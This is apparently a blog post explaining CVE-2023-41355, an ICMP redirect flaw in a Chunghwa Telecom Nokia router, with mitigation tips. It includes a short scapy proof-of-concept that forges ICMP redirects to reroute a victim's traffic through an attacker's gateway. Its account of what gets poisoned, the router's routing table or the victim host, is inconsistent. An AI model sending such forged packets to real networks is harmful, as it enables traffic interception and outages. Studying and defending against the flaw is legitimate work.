CVE-2023-41355 - Serious ICMP Redirect Vulnerability in Chunghwa Telecom NOKIA G-040W-Q Routers
A critical vulnerability identified as CVE-2023-41355 has been discovered in the firewall function of the Chunghwa Telecom NOKIA G-040W-Q router. The flaw allows unauthenticated, remote attackers to manipulate the network routing table by sending specially crafted ICMP redirect messages. This post will break down what this vulnerability is, why it matters, how it works, how attackers exploit it, and some ways you can protect yourself.
Attack Vector: Remote, unauthenticated (no login required)
- Impact: Malicious changes to the network routing table, leading to denial of service (DoS) or information leaks
- CVSS Score: 7.5 (High)
Why Is This Vulnerability Serious?
ICMP redirect messages are used by routers to update hosts about better routes. However, if the firewall doesn't properly check these messages, attackers can exploit this trust. As a result, they can:
Eavesdrop on unencrypted traffic (Information leakage)
This threat affects both home users and small businesses because the NOKIA G-040W-Q is a standard-issue fiber router for Chunghwa Telecom subscribers.
How Does the Exploit Work?
1. No Authentication Needed: Anyone on your network, or potentially from the wider internet if ICMP isn’t filtered, can send a crafted ICMP redirect packet.
2. Malformed Packet: The attacker creates an ICMP redirect message that falsely suggests a “better” router to reach a target destination.
3. Router Trusts the Message: Because the firewall does not validate the ICMP redirect properly, it updates its routing table with the malicious info.
4. Routing Table Compromised: Now, your router might start sending all your traffic to the attacker’s device.
Code Snippet: Generating a Crafty ICMP Redirect Packet
Below is a simple proof-of-concept in Python using scapy. This sends an ICMP redirect to a victim behind a vulnerable G-040W-Q router:
from scapy.all import *
victim_ip = "192.168.1.100"
fake_gateway = "192.168.1.200"
target = "192.168.1.1" # The router
icmp_redirect = IP(src=target, dst=victim_ip) / \
ICMP(type=5, code=1, gw=fake_gateway) / \
IP(src=victim_ip, dst="8.8.8.8") / ICMP()
send(icmp_redirect)
target: The router itself.
- This script poisons the victim so it sends Google (8.8.8.8) traffic via the attacker’s gateway.
Note: Do *not* use this against networks you don't own. It's illegal and unethical.
Real-World Attack Scenarios
- Man-in-the-Middle Attack: The attacker reroutes a victim’s traffic, intercepts sensitive info like passwords or personal data.
Denial of Service: Routes traffic into a black hole, disconnecting devices.
- Eavesdropping on IoT Devices: Attackers use this to capture info from smart home gadgets that don’t use encrypted connections.
Exploit References
- NVD (Official CVE entry): https://nvd.nist.gov/vuln/detail/CVE-2023-41355
- TWNCERT Advisory: https://www.twcert.org.tw/tw/cp-132-7448-48847-1.html
- scapy documentation: https://scapy.readthedocs.io/en/latest/usage.html
- ICMP Redirect Explanation: https://en.wikipedia.org/wiki/ICMP_Redirect
How To Protect Yourself
- Update Firmware: Ask Chunghwa Telecom for updates or check the router settings for newer firmware that fixes this issue.
- Block ICMP Redirects: Many routers allow you to disable ICMP redirects or set strict firewall rules.
Scan Your Network: Use tools like arping and route to detect unexpected route changes.
- Segregate Networks: Keep guest and IoT devices separate from main workstations to lower exposure.
Conclusion
CVE-2023-41355 highlights how improper firewall input validation—even for “simple” protocols like ICMP—can put thousands of homes and businesses at risk. Don’t overlook your router’s security! Stay updated, monitor your traffic, and reach out to your ISP if you suspect your device is vulnerable.
For more technical details and guidance, see the official TWNCERT bulletin or your device manual.
Timeline
Published on: 11/03/2023 06:15:07 UTC
Last modified on: 11/13/2023 19:54:23 UTC